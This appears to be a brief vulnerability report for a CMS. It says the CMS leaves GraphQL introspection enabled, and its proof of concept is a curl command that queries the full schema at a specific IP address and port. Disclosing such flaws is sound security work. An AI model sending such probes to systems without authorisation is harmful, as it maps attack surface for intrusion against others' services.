Sensitive Information Disclosure via Introspection Query #541
Description
summary
The GraphQL feature of this CMS system enables Introspection Queries, which allows any attacker to carry out Introspection Query attacks and thereby disclose the capabilities of the target GraphQL API.
POC
curl -X POST -H "User-Agent: oxpecker" -H "Accept-Encoding: gzip, deflate" -H "Accept: */*" -H "Connection: keep-alive" -H "Content-Length: 94" -H "Content-Type: application/json" -d '{"query": "query cop { __schema { types { name fields { name } } } }", "operationName": "cop"}' 'http://34.127.101.91:40410/graphql'